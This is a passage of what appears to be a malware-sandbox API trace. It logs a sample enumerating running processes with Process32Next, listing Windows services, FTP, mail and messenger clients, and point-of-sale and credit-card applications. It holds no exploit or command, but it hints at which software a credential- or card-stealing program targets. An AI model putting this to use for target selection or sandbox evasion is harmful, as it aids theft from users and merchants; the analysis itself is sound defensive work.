pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.115] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.117] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.119] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.208] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.210] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.211] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.213] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.215] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.217] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.219] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0228.221] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0228.223] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.225] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.226] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0228.228] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0228.230] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0228.232] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0228.234] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.235] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.237] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.238] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.240] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.242] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0228.244] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0228.269] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0228.271] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0228.273] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0228.274] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0228.275] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0228.280] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0228.282] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0228.284] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0228.285] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0228.287] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0228.288] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0228.290] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0228.295] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0228.297] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0228.299] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0228.300] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0228.302] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0228.303] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0228.305] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0228.307] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0228.390] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0228.391] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0228.393] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0228.395] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0228.396] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0228.398] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0228.400] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0228.404] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0228.406] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0228.408] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0228.410] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0228.412] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0228.414] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0228.419] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0228.422] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0228.424] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0228.432] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0228.434] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0228.436] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0228.437] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0228.439] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0228.440] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0228.442] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0228.444] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0228.445] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0228.447] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0228.452] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0228.453] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0228.455] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0228.457] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0228.458] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0228.460] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0228.462] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0228.463] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0228.471] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0228.473] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0228.475] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0228.477] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0228.482] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0228.484] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, 